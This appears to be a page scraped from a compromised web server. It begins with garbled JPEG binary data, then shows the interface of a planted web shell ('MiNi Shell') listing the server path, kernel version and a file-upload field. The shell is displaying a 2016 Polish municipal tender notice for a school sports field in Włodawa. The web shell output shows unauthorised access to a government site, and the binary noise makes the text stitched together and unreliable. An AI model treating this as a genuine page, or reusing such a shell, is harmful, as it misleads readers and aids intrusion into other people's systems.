JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160722/149981-N-2016.html

<p class="kh_header"><b>Włodawa: Modernizacja boiska szkolnego wraz z częścią lekkoatletyczną
 przy Szkole Podstawowej nr 2 we Włodawie</b><br>
<b>Numer ogłoszenia: 149981 - 2016; data zamieszczenia: 22.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Włodawy , al. J. Piłsudskiego 41, 22-200 Włodawa, woj. lubelskie, tel. (082) 57 21 444, faks (082) 57 22 454.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.wlodawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja boiska szkolnego wraz z częścią lekkoatletyczną
 przy Szkole Podstawowej nr 2 we Włodawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem inwestycji jest budowa boisk szkolnych wraz z częścią lekkoatletyczną, budowa oświetlenia z monitoringiem boisk szkolnych we Włodawie przy ul. Kopernika 3, na działce nr 1739 na 2. W ramach zadania inwestycyjnego zaprojektowano następujące obiekty i prace:boisko szkolne z poliuretanu do siatkówki i koszykówki o długości L=32,0m i szerokości B=17,0m wraz z wyposażeniem boisko szkolne z poliuretanu do piłki ręcznej i tenisa ziemnego o długości L=44,0m i szerokości B=22,0m wraz z wyposażeniem, bieżnię z poliuretanu na dystans 60m, o długości ze strefami startu i końca biegu L=69m i szerokości B=5,0m na 4 tory do biegu. skok w dal z poliuretanu o długości L=20,0m i szerokości B=1,22m, zakończony strefą piasku wraz z wyposażeniem systemowe piłkochwyty o wysokości H=4,0m, za bramkami i przy boisku do siatkówki i koszykówki.
rozbiórka ogrodzenia istniejącego wraz z cokołem betonowym w miejsce którego zaprojektowano nowe ogrodzenie (16). Fundamenty istniejące bez rozbiórki.
bramę wjazdową o szerokości B=700x160cm jako przesuwna zasilana elektrycznie zgodnie z opracowaniem branży elektrycznej. Brama wjazdowa z profili stalowych zamkniętych malowanych proszkowo w kolorze zielonym. Zasilanie, oświetlenie oraz monitoring. 2. Nawierzchnie powinny być wykonane zgodnie z instrukcjami producenta i projektem technicznym opracowanym dla określonego zastosowania. Wykonanie i odbiór urządzeń sportowych na podstawie aprobat technicznych ITB, atestów higienicznych, wymogów p.poż., warunków technicznych stosowania i Polskich Norm. W trakcie realizacji projektu należy stosować materiały i wyroby posiadające obowiązujące świadectwa dopuszczenia do stosowania w budownictwie lub jeśli są przedmiotem Norm Państwowych, zaświadczenie producenta potwierdzające ich zgodność z postanowieniami odpowiednich norm.
Wszelkie roboty budowlane winny być prowadzone zgodnie ze sztuką budowlaną i polskimi normami. a) Przekrój przez podbudowę: grunt rodzimy nośny dogęszczony przypowierzchniowo wg, normy. piasek średni ID=0,60 o grubości 50,0cm zagęszczony warstwami wg, normy. tłuczeń - kruszywo frakcji 31,5 na 63 grubości 12 cm, kliniec - kruszywo frakcji 0-31,5 grubości 8 cm, warstwa nośna  - elastyczna ET - przepuszczalny podkład elastyczny: granulat i ścier gumowy ze żwirem kwarcowym z lepiszczem poliuretanowym. Grubość całkowita podkładu: 3,5 cm, nawierzchnia poliuretanowa grubości 1,6 cm wg opisu wyżej.
odwodnienie liniowe zgodnie z zagospodarowaniem działki. Zaprojektowano krawężniki betonowe 8x30,0cm na podsypce cem.-piaskowej 1:4 o gr.4,0cm wraz z ława betonową z betonu B10 oraz warstwa filtracyjna z piasku, obrzeża z wypełnieniem spoin zaprawą cementową, pokryte poliuretanem w kolorze płyty boisk. Zaprojektowano odpowiednie spadki w kierunku zieleni-patrz projekt zagospodarowania działki. 3. Boisko do piłki ręcznej i tenisa ziemnego w kolorze zielonym. 4. Boisko do siatkówki i koszykówki, bieżnia na 60 m i skok w dal w kolorze ceglastym. 5. Piłkochwyty- systemowe lakierowane słupy stalowe w fundamencie wraz z tulejami zastrzałami skrajnego słupa, siatki zabezpieczające oraz elementy montażowe niezbędne do zawieszenia siatki. Piłkochwyty winny posiadać certyfikat zgodności z obowiązującą normą PN-EN. a) Konstrukcja: -słupy narożne z profili kwadratowych 100x100x5mm zabezpieczonych antykorozyjnie i malowanych na kolor zielony z zastrzałami od wysokości do 3,0m z profilu 50x50x5mm. Posadowienie w gruncie w betonowych stopach fundamentowych 50x50x100cm, -słupy przelotowe z profili kwadratowych 80x80x5mm zabezpieczonych antykorozyjnie i malowanych na kolor zielony. Posadowienie: j.w., rozstaw słupów przyjęto co 2,5 0m.
b) Wypełnienie:
-siatka stalowa fi 2,8mm powlekana o oczku 35x35mm w kolorze zielonym, mocowanie siatki do konstrukcji za pomocą liny stalowej o fi 6,3mm co 50,0cm.
6. Ogrodzenie. Rozbiórka  istniejącego ogrodzenia wraz z cokołem betonowym, w miejsce którego zaprojektowano nowe ogrodzenie. Fundamenty istniejące bez rozbiórki.Zaprojektowano ogrodzenie, przęsła z profili stalowych zamkniętych malowanych proszkowo w kolorze zielonym ramach z profili stalowych zamkniętych, słupki między przęsłowe j.w 70x50x2mm kotwione w fundamencie betonowym istniejącym na h=60cm. Cokół projektowany prefabrykowany 25x248x6cm, wbetonowany 4,0cm w nadlewce cokołowej o wysokości h=20cm z betonu B15. Wysokość ogrodzenia całkowita170cm. Rama główna przęsła-profil stalowy zamknięty-30x18x1,5mm Poziome wzmocnienia ramy głównej-płaskownik 20x1mm Wypełnienie przęsła-profil stalowy zamknięty-20x20x1,5mm. Rama montowana poprzez płaskowniki - 50x5mmi śruby-M10 do słupków głównych przęseł. Zaprojektowano bramę wjazdową (17)- o szerokości B=700x160cm jako przesuwna zasilana elektrycznie zgodnie z opracowaniem branży elektrycznej. Brama wjazdowa z profili stalowych zamkniętych malowanych proszkowo w kolorze zielonym.
8. Zasilanie, oświetlenie, monitoring. Projekt obejmuje swoim zakresem budowę oświetlenia boisk szkolnych, zasilenie bramy wjazdowej  oraz  monitoring  na  boisku  szkolnym. Trasa kabla winna przebiegać zgodnie z załączonym podkładem mapowym. Trasę należy wyznaczyć  geodezyjnie.  Wykopy  pod  kabel  winny  być  wykonane  ręcznie  bez  używania sprzętu mechanicznego. Kable  należy  układać
w  rowie  0,8x0,4m  na  10-cio  cm  podsypce  piaskowej,  przysypać 10-cio cm warstwą piasku, a następnie 15-to cm warstwą gruntu rodzimego, przykryć folią ochronną koloru niebieskiego. Zasypać wykop z warstwowym ubijaniem ziemi. 
a) W miejscach oznaczonych na podkładach mapowych projektuje się montaż:
Masztów  oświetleniowych  aluminiowych  o  wysokości  L=12,5m  posadowionych  na fundamentach  prefabrykowanych.  Na  masztach  przewiduje  się  montaż  wysięgników aluminiowych z zakończeniem ku 100x180 dla trzech projektorów,
Lamp  parkowych  solarnych  jednoramiennych  o  wysokości  L=4m  posadowionych  na fundamentach prefabrykowanych 300x300 ze źródłem światła LED 16W. 
b) Monitoring  na  zewnątrz  należy  zrealizować  w  oparciu  o  kamery  megapikselowe  z  obiektywem 3.6 mm lub szerszym 1-3- CMOS, wbudowanym oświetlaczem podczerwieni i mechanicznym filtrem podczerwieni, zamontowane w fabrycznie zintegrowanych obudowach zewnętrznych  lub  dedykowanych  dla  kamer  IP  obudowach  z  grzałką  i  oświetlaczem podczerwieni  zasilanych  napięciem  230V.Obraz  z  kamer  rejestrowany  będzie  za  pomocą  rejestratora  IP  umożliwiającym podłączenie  do  16  megapikselowych  kamer  o  maksymalnej  rozdzielczości  zapisu  do  5M. Rejestrator  musi  umożliwiać  instalację  minimum  dwóch  dysków  twardych, na potrzeby aktualnie projektowanej instalacji przyjęto instalację jednego dysku twardego o pojemności minimum 3TB. Rejestrator  oraz  zasilacze  sieciowe  należy  umieścić w  szafie  rack  SK  19  w  miejscu wyznaczonym na urządzenia do telewizji przemysłowej w pomieszczeniu xero przy gabinecie wicedyrektora.Zaleca się aby zarówno kamery oraz rejestrator pochodziły od jednego producenta z uwagi  na  ograniczenia  licencyjne  oraz  współpracę  kamer  z  rejestratorem  za  pomocą protokołu  ONVIF  w  ograniczonej  funkcjonalności.  Wszystkie  podłączenia  i  instalację urządzeń  należy  wykonać  zgodnie  z  obowiązującymi  normami  oraz  dokumentacją techniczno - rozruchową dostarczoną przez producenta systemu. Konfigurację programową (ilość rejestrowanych klatek na s, tryb zapisu itp.) należy uzgodnić z użytkownikiem systemu.  9.  Z uwagi na złożoność zadania szczegółowy zakres robót zawiera dokumentacja projektowa stanowiąca załączniki od 8 do 12 do SIWZ, powyżej wymieniono tylko podstawowe roboty niezbędne do wykonania w ramach zamówienia. Zgodnie z art. 30 ust. 4 ustawy Pzp, Zamawiający dopuszcza rozwiązania równoważne.
Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane roboty budowlane spełniają wymagania określone przez Zamawiającego (art. 30, ust. 5 ustawy).
Za rozwiązanie równoważne uznane będzie wykonanie robót przy wykorzystaniu technologii, materiałów i sprzętu innego niż określone w SST zaproponowane w ofercie, pod warunkiem, że ich parametry będą nie gorsze niż określone w SST. Ilekroć w dokumentacji podane są typy urządzeń lub wyrobów oraz ich producenci, należy traktować je jako przykładowe. Do realizacji robót mogą być stosowane urządzenia lub wyroby równoważne o minimalnych parametrach technicznych jak wskazane w dokumentacji, dopuszczone do stosowania w krajach Unii  Europejskiej.
Gdy zaoferowane rozwiązania równoważne będą powodowały konieczność zmiany dokumentacji projektowej, Wykonawca, którego oferta będzie wybrana jako najkorzystniejsza, zobowiązany będzie do dokonania - przed rozpoczęciem wykonania przedmiotu zamówienia - zmiany tej dokumentacji oraz poniesie koszty tych zmian..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.61.00-1, 45.21.20.00-6, 45.21.11.20-4, 45.21.22.21-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 15 000,00 zł                                                                                                 (słownie: piętnaście tysięcy złotych 00gr)
2. Wadium można wnieść w:
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6B ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.). 
3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego  Bank Polska Kasa Opieki S.A. O Włodawa 71 1240 2249 1111 0010 2932 7158. W tytule wpłaty zaleca się wpisanie:  Wadium na boisko szkolne przy SP2- ZPA.271.22.2016.MJ. 
4. Oferta jest skutecznie zabezpieczona wadium, jeśli środki w pełnej kwocie (wartości) znajdują się na koncie Zamawiającego w terminie składania ofert, lub Wykonawca dostarczy dokument potwierdzający wniesienie wadium w formie innej niż pieniężna, np. poręczenie, gwarancje w terminie przewidzianym na składanie ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań dotyczących posiadania uprawnień do wykonywania określonej działalności lub czynności. Za spełnienie warunku uznane zostanie złożenie oświadczenia zgodnie z załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej dwie roboty budowlane polegające na budowie wielofunkcyjnych boisk sportowych z nawierzchnią poliuretanową o wartości nie mniejszej niż 300 000 zł brutto każde (słownie: trzysta tysięcy złotych).  
UWAGA ! Warunek nie zostaje spełniony, gdy wykonawca wykaże się wykonaniem kilku boisk sportowych  o mniejszej wartości, których wartość łącznie wyniosła  300 000 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań dotyczących niniejszego warunku .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje co najmniej jedną osobą  posiadającą uprawnienia do kierowania robotami budowlanymi o specjalności: konstrukcyjno - budowlanej, - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity w Dz. U. z 2016 r., poz.290 ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań dotyczących niniejszego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy (zgodnie z załącznikiem nr 1 do SIWZ) 
2) Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów (należy załączyć dokumenty, z których wynikać będzie ciągłość i prawidłowość udzielonych pełnomocnictw - odpisy z właściwego rejestru). Załączone do oferty pełnomocnictwo winno być w formie oryginału lub kopii poświadczonej notarialnie.
3) W przypadku złożenia oferty wspólnej: przedsiębiorcy występujący wspólnie muszą upoważnić jednego spośród siebie jako przedstawiciela pozostałych - lidera do zaciągania zobowiązań i rozporządzania prawem w sprawach związanych z przedmiotem postępowania, a jego upoważnienie musi być udokumentowane pełnomocnictwem podpisanym przez pozostałych przedsiębiorców lub ich uprawnionych przedstawicieli.
4) W przypadku polegania przez Wykonawcę na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca składa w szczególności pisemne zobowiązanie podmiotu trzeciego lub inne dokumenty potwierdzające w sposób jednoznaczny że zasoby, które zostaną mu udostępnione przez podmiot trzeci na czas realizacji zamówienia będą realnie pozostawać w jego dyspozycji.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - okres gwarancji - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zamawiający dopuszcza zmianę umowy w formie aneksu, w sytuacji zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 14 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta nie spowoduje zmiany wynagrodzenia Wykonawcy, może spowodować wydłużenie terminu wykonania zamówienia jedynie w stopniu niezbędnym aby dostosować realizację zamówienia do zmiany przepisów prawnych. Inicjatorem tej zmiany może być Zamawiający lub Wykonawca.2) Zamawiający dopuszcza zmianę umowy w formie aneksu w sytuacji, kiedy nastąpi ustawowa zmiana stawki VAT. Inicjatorem tej zmiany może być Zamawiający lub Wykonawca. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 14 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta nie wpłynie na termin wykonania prac, i nie spowoduje zmiany wynagrodzenia Wykonawcy o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę. Koszty związane z podwyższoną stawką podatku VAT ponosi Wykonawca .3) Zamawiający dopuszcza zmianę kierownika budowy oraz innych osób biorących po stronie Wykonawcy udział w realizacji przedmiotu umowy, w sytuacji zdarzeń losowych oraz w przypadku niewywiązywania się z pełnionych obowiązków. Inicjatorem zmiany może być Zamawiający i Wykonawca. Zmiana musi nastąpić na osoby, które spełniają warunki określone w SIWZ. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 3 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zamiana ta wymaga zgody zamawiającego. Zmiana te nie wpłynie na termin wykonania prac i nie spowoduje zmiany wynagrodzenia Wykonawcy.  4)Zamawiający, po wyrażeniu zgody, dopuszcza zmianę terminu umowy w formie aneksu w przypadku:a) wystąpienia nieprzewidzianych warunków i zjawisk atmosferycznych np. kataklizmy, b) wystąpienia siły wyższej np.: trąby 